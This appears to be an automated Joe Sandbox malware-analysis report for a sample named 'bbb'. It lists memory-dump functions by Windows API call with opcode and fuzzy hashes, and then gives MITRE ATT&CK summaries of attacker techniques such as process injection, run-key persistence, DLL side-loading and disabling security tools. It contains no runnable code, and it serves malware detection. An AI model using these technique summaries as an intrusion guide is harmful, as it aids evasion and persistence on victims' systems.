GetFileType.KERNELBASE(?,00000E24,9AE30442,00000000,00000000,00000000,00000000), ref: 0143BF0D

Memory Dump Source

Source File: 00000005.00000002.2131907724.000000000143A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_143a000_bbb.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: e9e6524d9c9db447009122b1689379392e61db87436ee1d5fe78d148381af380
Instruction ID: c20ce6b15ab4058b54dbeff60df4c68c1324956f36bb712b12435662dae9f27f
Opcode Fuzzy Hash: e9e6524d9c9db447009122b1689379392e61db87436ee1d5fe78d148381af380
Instruction Fuzzy Hash: C6012275500200AEE720CB06CC84BAAFBE8DF48324F08C096EE048B752C375E949CAB2

Function 0622232E Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 0622237A

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: fdcead69a9da4e4fb3520202ec0358a259f016b310f18f95db3541bed89df09d
Instruction ID: b88df289ff5cdc025598b3549315be8f7100cfa876617810f8371369325bc5ab
Opcode Fuzzy Hash: fdcead69a9da4e4fb3520202ec0358a259f016b310f18f95db3541bed89df09d
Instruction Fuzzy Hash: 21119E71910201EFDB60CF51C844BA6FBE4FF08220F08846ADD858B612D376E508CFA1

Function 062228FA Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameW.KERNEL32(?,00000E24,?,?), ref: 0622294A

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: 95c9c040d4efa84ebfa0b657ff33cf82bb74da7cca4776ee84cb82d1f03d8c3d
Instruction ID: a426cee1f8ecc4ca5dd48d95595c22606d81833eeae39f3fa4b54d641dd46e9a
Opcode Fuzzy Hash: 95c9c040d4efa84ebfa0b657ff33cf82bb74da7cca4776ee84cb82d1f03d8c3d
Instruction Fuzzy Hash: 4F01B171A00200ABD310DF16CD46B66FBE8EB88B20F14811AED089BB41D731B955CBE1

Function 06222D22 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06222D66

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7d370910e9c7cc90904f7592b2af386b40392835b55546371b096db842ff2056
Instruction ID: 0a31e775f6495a248bca7769e551ac3dd3628eff80e5aa30cd14e551035cf2e8
Opcode Fuzzy Hash: 7d370910e9c7cc90904f7592b2af386b40392835b55546371b096db842ff2056
Instruction Fuzzy Hash: 5201C432910600EFDB618F51D844B56FBE0EF08720F08C85AED494A615C376E514CFA2

Function 0622037E Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

RasEnumConnectionsW.RASAPI32(?,00000E24,?,?), ref: 062203CE

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: ConnectionsEnum
String ID:
API String ID: 3832085198-0
Opcode ID: ff0652c0ed4f2947baa92045d5bc8fd62fcd284e8906e54399a6d47aa19dbf0f
Instruction ID: 1ebc3a67c51333586e862b795badaf21a1baf210f7f72ce4b3ed4d8b2e64a3ee
Opcode Fuzzy Hash: ff0652c0ed4f2947baa92045d5bc8fd62fcd284e8906e54399a6d47aa19dbf0f
Instruction Fuzzy Hash: A3018671500600ABD310DF16DD46B66FBE8FB88B20F14815AED089BB41D771F955CBE6

Function 062202AA Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,?,?), ref: 062202FA

Memory Dump Source

Source File: 00000005.00000002.2133000336.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6220000_bbb.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1e401fb27c1120fa85febeb6a6604f3f6a9a969695a085c5c0e0f3851444f868
Instruction ID: c6b327fc1c5784ba55a5091af25d90aeff9c20d1258a6e0b603219b7dfa4fc6f
Opcode Fuzzy Hash: 1e401fb27c1120fa85febeb6a6604f3f6a9a969695a085c5c0e0f3851444f868
Instruction Fuzzy Hash: 5901D671500200ABD310DF16CD46B66FBE8FB88B20F14811AED089BB41D771F955CBE6

Function 0143A772 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000E24,?,?), ref: 0143A7C2

Memory Dump Source

Source File: 00000005.00000002.2131907724.000000000143A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_143a000_bbb.jbxd

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: 5f627177de8d4924b8ee75acaf3d2f93c8c90bb95fb3a630c0fed64334c090f3
Instruction ID: 242b5c91d51d772a2a2e56fa55c03e38fdf3ace8ca5bf27cac950a3be4136c45
Opcode Fuzzy Hash: 5f627177de8d4924b8ee75acaf3d2f93c8c90bb95fb3a630c0fed64334c090f3
Instruction Fuzzy Hash: FB01D671500200ABD310DF16CD46B66FBE8FB88B20F14811AED089BB41D771F959CBE6

Function 0143A09A Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 0143A0D5

Memory Dump Source

Source File: 00000005.00000002.2131907724.000000000143A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_143a000_bbb.jbxd

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 60e12afd27f4764e5e7f96d3116cdb74377a34ab1c987256e867a74a8eaecb12
Instruction ID: bdbfca6e0a12d71290cdeb8c877b3bd7a2d009e60d30f8f37343443a76f23480
Opcode Fuzzy Hash: 60e12afd27f4764e5e7f96d3116cdb74377a34ab1c987256e867a74a8eaecb12
Instruction Fuzzy Hash: 9D01B1765002409FDB60CF55D884B66FBE4EF48320F18C49BDD898B666D375E408CBA2

Function 0143A2DA Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0143A30C

Memory Dump Source

Source File: 00000005.00000002.2131907724.000000000143A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_143a000_bbb.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 70eef5ccdfad9075c3d15bf218c228f8811b60e7ea7e0ac759b8ad990d6d93ff
Instruction ID: 74941509f14dd733acbcb304c3a022490b423cd7a7aabab071b7ba602c1f662d
Opcode Fuzzy Hash: 70eef5ccdfad9075c3d15bf218c228f8811b60e7ea7e0ac759b8ad990d6d93ff
Instruction Fuzzy Hash: 73F0AF75944244DFDB60CF05D884766FBE4EF49724F18C09ADD498B762D3B9E808CBA2

Function 056D07CE Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2132586564.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_56d0000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6e350214ff0aaf79d2043c506b5f1484bb3999b934427fac25e833f884afce4
Instruction ID: f478bbfa8d3277eade3571f9486073f4b58fd31ad15a73b8c1802fda80850472
Opcode Fuzzy Hash: f6e350214ff0aaf79d2043c506b5f1484bb3999b934427fac25e833f884afce4
Instruction Fuzzy Hash: 0B51EF31F001158FCB58EB78D448AAEB7F6AFC8214F258569D419DB790EB349D0AC7E1

Function 056D0560 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2132586564.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_56d0000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a29a77f18066cdc1860af865c2bd7af41d0e5e403f74a8ebde1bc1cca4be2f29
Instruction ID: 0bbe90dcad6b145f01cd8005c38176c0fa83394dc113d9882440d2246d06921d
Opcode Fuzzy Hash: a29a77f18066cdc1860af865c2bd7af41d0e5e403f74a8ebde1bc1cca4be2f29
Instruction Fuzzy Hash: B131A474F002059BDF28DF759969BAEB7F2ABD8304F108429D406EB790DE358C05DBA1

Function 056D06D1 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2132586564.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_56d0000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7dd3f0fd9a2738ef390aca2427229b8f9743f280fcf8e89e9c695c978fd84f7
Instruction ID: e6ff254cfb12ad4205b46386a36cc8b0f736df90d11eb7e5c47bd0fd5aa723e8
Opcode Fuzzy Hash: c7dd3f0fd9a2738ef390aca2427229b8f9743f280fcf8e89e9c695c978fd84f7
Instruction Fuzzy Hash: 07212E75B00215CFCB54DB78C56C6AEBBF2AF48624F140869D402EB391EF359C46CBA5

Function 05FB2AA2 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2132907204.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5fb0000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eaddf7bd2fdd7d19bbaa43d6026601cf15de657ac404c984024b7f834ed4841
Instruction ID: bdc8b0f315c54f30ce032a8e374acddf061062597aa9fd40c4bf22f1a7c9ae4f
Opcode Fuzzy Hash: 9eaddf7bd2fdd7d19bbaa43d6026601cf15de657ac404c984024b7f834ed4841
Instruction Fuzzy Hash: D721C8B5608341AFD340CF19D840A5BFBE4EF89664F04896EF998D7311D275E909CFA2

Function 05FB3514 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2132907204.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5fb0000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e84f906b6ad499f98073553ca3124cee950c501a70b8435fc5f445f208406f4
Instruction ID: 1631e51ec51ff97f5c9fe942d73c117c69d50358b95e0e80a70aa7ecc2b5a0f0
Opcode Fuzzy Hash: 6e84f906b6ad499f98073553ca3124cee950c501a70b8435fc5f445f208406f4
Instruction Fuzzy Hash: DC11BAB5908341AFD340CF19D880A5BFBE4FB98664F04895EF998D7311D231E904CFA2

Function 016E12DC Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2132199161.00000000016E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16e0000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3979785f67ed4953d949dca166fd7f3ff1ab8056b227dedeadc9b130f11227a1
Instruction ID: e86c6924f548059226adddbbc1c1ed79e442e13f85ed2149cf8f07e3774e3b38
Opcode Fuzzy Hash: 3979785f67ed4953d949dca166fd7f3ff1ab8056b227dedeadc9b130f11227a1
Instruction Fuzzy Hash: 94110670205284DFD715CB14CD44B26BBE1EB8A708F28C69CE5494BB43C737D803D641

Function 05FB33B8 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2132907204.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5fb0000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1159d4ebe4c18caafbd540de4f13270ac02ca51c9a0a3ff587ce014ecc50dff
Instruction ID: 10b0d1d941c1aa410e2abe23469e855a666e9b28ee02342a83b8a5655a121056
Opcode Fuzzy Hash: c1159d4ebe4c18caafbd540de4f13270ac02ca51c9a0a3ff587ce014ecc50dff
Instruction Fuzzy Hash: DC11E8B5908301AFD750CF09DC80A5BFBE8EB88660F04881EF95897311D231E9088BA2

Function 056D0938 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2132586564.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_56d0000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b90d1780ad60223ac9516dd70739dce0a97496d53de91576a41f69d4d2b4d13
Instruction ID: ad340d8b1874e25d03b84b9bfc058e1692746b33615e5b0a6267db53c5d53fa1
Opcode Fuzzy Hash: 4b90d1780ad60223ac9516dd70739dce0a97496d53de91576a41f69d4d2b4d13
Instruction Fuzzy Hash: 0C019E71B001248F8B44EB7DA51466FB6F3EFD9254B11417AD509EB350EF358D0687E2

Function 056D04B8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2132586564.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_56d0000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dfff9fdd6e3db0c0c115c0ceef6966449899f7e465dd94d2b759647f65303f8
Instruction ID: d23f66c7f0e00e9f0beddac58411f51f0e776b5cda52e7f9d6fcfdd0b0216f71
Opcode Fuzzy Hash: 6dfff9fdd6e3db0c0c115c0ceef6966449899f7e465dd94d2b759647f65303f8
Instruction Fuzzy Hash: 8B01C435B00214DBCB10DF74E81869EB7F5EB88251F104869D90AE3350EF359C05C7A4

Function 016E1398 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2132199161.00000000016E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16e0000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3c181a57d58872c77186dea16c7b84c2b348ca3ffffdec1f3d2b946b90fd649
Instruction ID: b12c72d54201fec01769cd72d5b9b3c23d9f912e8820a069ccb704a6f30e50a7
Opcode Fuzzy Hash: a3c181a57d58872c77186dea16c7b84c2b348ca3ffffdec1f3d2b946b90fd649
Instruction Fuzzy Hash: FAF0F635108644DFC706CF04D984B16FBE2EB89718F24CAA9E9491BB62C337A813DA81

Function 016E0606 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2132199161.00000000016E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16e0000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 299d6e1546a2d46a4be0f0c5f13a2ee02f916aed0f10b805952ec1040ca7a6f4
Instruction ID: 630818c5d9767232bcca20cefc0af076e8ee4859af7fae3795535762d9cf13e8
Opcode Fuzzy Hash: 299d6e1546a2d46a4be0f0c5f13a2ee02f916aed0f10b805952ec1040ca7a6f4
Instruction Fuzzy Hash: 3BE092B66046045B9650CF0AFD41452F7D8EB88630748C07FDC0D8B701D636B908CAA6

Function 05FB357F Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2132907204.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5fb0000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1afa68dead7571f2cf0dd825341845eb186d90f3a81dba0ab5dbecbc38ffe104
Instruction ID: 322a40aced3d05610cb64a2a5fba7daca8ea33717fbb59004c1f5348f652ac1b
Opcode Fuzzy Hash: 1afa68dead7571f2cf0dd825341845eb186d90f3a81dba0ab5dbecbc38ffe104
Instruction Fuzzy Hash: 9CE0D8F654020467D7508E069C45F52FBD8DB54A30F04C46BED081B742D172B914CAF1

Function 05FB2B17 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2132907204.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5fb0000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41e2852a9c4b08ba30f2b0f1bfa81c48f9a3652894eab37a834149d8b7248787
Instruction ID: 20d137775fd01df820306661c342ef64edde9df507b9902f6d72525c5eb197ca
Opcode Fuzzy Hash: 41e2852a9c4b08ba30f2b0f1bfa81c48f9a3652894eab37a834149d8b7248787
Instruction Fuzzy Hash: 61E0D8B660020467D3108F069C45F52FB98DB50A30F04C457EE081B742E172B914CAF1

Function 05FB3407 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2132907204.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5fb0000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1ff31c87e9391440c0a83686705176bc3d506036e9b9654bb0aa1d25c30d271
Instruction ID: d196d0689c066f2c24a2440aacf50e0fbbe38317d2e9b882eda54f4c5399f6d3
Opcode Fuzzy Hash: d1ff31c87e9391440c0a83686705176bc3d506036e9b9654bb0aa1d25c30d271
Instruction Fuzzy Hash: 9BE0D8B650020467D6509E069C85F53FBE8DB50A30F04C457EE0C1B702D172B904CAF1

Function 056D0BF9 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2132586564.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_56d0000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44d21d0c36fd5532e4ddcee4c94cf98b8626f375b8e926444bbf53e054a6fdba
Instruction ID: df7c4bfa4d95b6baa32df69cf4df1e08adc17d2c67aa87fe9976cd4a16bd3dd9
Opcode Fuzzy Hash: 44d21d0c36fd5532e4ddcee4c94cf98b8626f375b8e926444bbf53e054a6fdba
Instruction Fuzzy Hash: 6DE0866370015467D508222D94157EDB6DE8BD6119B09107FE605CB3A1DE959C028299

Function 056D0C08 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2132586564.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_56d0000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d68fa2dc252fa2403bd748c45f23f526085c0a8a458948699a3d208bdbb7db0
Instruction ID: 3c250614888f34e54564718bc59d18d04c6dfe574662edf3aca413ee262a4f9f
Opcode Fuzzy Hash: 1d68fa2dc252fa2403bd748c45f23f526085c0a8a458948699a3d208bdbb7db0
Instruction Fuzzy Hash: F6D0A731300050570508366E90149FEF6DFCFDA565309007FE20ACB361CE959C0543EA

Function 014323F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2131889581.0000000001432000.00000040.00000800.00020000.00000000.sdmp, Offset: 01432000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1432000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a17e674f502fe5ef4d83840b5170993096e33d7830677694ea030d119087d996
Instruction ID: dd9a0489f8a448ec5e64c7e953f1e6d85d422b96c4fd67fa28d8a82ebd5a40b0
Opcode Fuzzy Hash: a17e674f502fe5ef4d83840b5170993096e33d7830677694ea030d119087d996
Instruction Fuzzy Hash: 8CD05E792056E14FE3169B1CC2A8F963BE4ABA5714F4A44FAA840CB773C7B8E5C5D600

Function 014323BC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2131889581.0000000001432000.00000040.00000800.00020000.00000000.sdmp, Offset: 01432000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1432000_bbb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb9b194895b9949b356abf542d1ef58449c09161786a3327679ab123b48d9f98
Instruction ID: 9f244035320bf0c66041d634b39e458391823513f55457ed9b676aedcc51f2ca
Opcode Fuzzy Hash: bb9b194895b9949b356abf542d1ef58449c09161786a3327679ab123b48d9f98
Instruction Fuzzy Hash: 89D05E352406814BD715DA1CC2E4F5A7BD4AB84B14F0A44E9AC108B772C7B8D8C4DA00

Non-executed Functions

Function 056D1299 Relevance: 5.5, Strings: 4, Instructions: 497COMMON

Download Yara Rule

Strings

]XZk^, xrefs: 056D15F1, 056D15F6
MXZk^, xrefs: 056D15A0, 056D15A5
mXZk^, xrefs: 056D168D, 056D1692
}XZk^, xrefs: 056D16F5, 056D16FA

Memory Dump Source

Source File: 00000005.00000002.2132586564.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_56d0000_bbb.jbxd

Similarity

API ID:
String ID: MXZk^$]XZk^$mXZk^$}XZk^
API String ID: 0-256532575
Opcode ID: 659cfd14e0d328f08b8d923164ba9e66b7609fdd8b57f0f6d9f931f32cadb2fc
Instruction ID: 500c08eebcb771f2de5a84f4db6d29bced5b38b6f29244577f22638a63852960
Opcode Fuzzy Hash: 659cfd14e0d328f08b8d923164ba9e66b7609fdd8b57f0f6d9f931f32cadb2fc
Instruction Fuzzy Hash: 33022630F042104BDB28AB39E55837DB2E3ABD6609F044469D5068BBD5DFB9CD4AC7E2

Function 056D13E3 Relevance: 5.4, Strings: 4, Instructions: 425COMMON

Download Yara Rule

Strings

]XZk^, xrefs: 056D15F1, 056D15F6
MXZk^, xrefs: 056D15A0, 056D15A5
mXZk^, xrefs: 056D168D, 056D1692
}XZk^, xrefs: 056D16F5, 056D16FA

Memory Dump Source

Source File: 00000005.00000002.2132586564.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_56d0000_bbb.jbxd

Similarity

API ID:
String ID: MXZk^$]XZk^$mXZk^$}XZk^
API String ID: 0-256532575
Opcode ID: eff158b48e5852c4acf08a31734b413fb9a650490651b2f4a8c3e75ca450fda0
Instruction ID: 819668b7764890f6b718c2a2c4ae4ed2a55b7827842ce80745b94c4a44a8fd79
Opcode Fuzzy Hash: eff158b48e5852c4acf08a31734b413fb9a650490651b2f4a8c3e75ca450fda0
Instruction Fuzzy Hash: 8BE13430B041104BDB28AB79945837DB6E3ABD6609F08446ED5068B7E5CFBDCD0AC7E2

Function 056D142B Relevance: 5.4, Strings: 4, Instructions: 413COMMON

Download Yara Rule

Strings

]XZk^, xrefs: 056D15F1, 056D15F6
MXZk^, xrefs: 056D15A0, 056D15A5
mXZk^, xrefs: 056D168D, 056D1692
}XZk^, xrefs: 056D16F5, 056D16FA

Memory Dump Source

Source File: 00000005.00000002.2132586564.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_56d0000_bbb.jbxd

Similarity

API ID:
String ID: MXZk^$]XZk^$mXZk^$}XZk^
API String ID: 0-256532575
Opcode ID: c62f71536d04c2dc8d90c8659a1f52e8274870a6d724e8cf0ca9bf96915ec0eb
Instruction ID: dc0b3da23c8ab367b6964dea54b63016087b3916c29c168200270b1b3c64577b
Opcode Fuzzy Hash: c62f71536d04c2dc8d90c8659a1f52e8274870a6d724e8cf0ca9bf96915ec0eb
Instruction Fuzzy Hash: E4E14430B041104BDB28AB39945837DB6E3ABD6609F08446ED5068B7E5CFBDCD0AC7E2

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

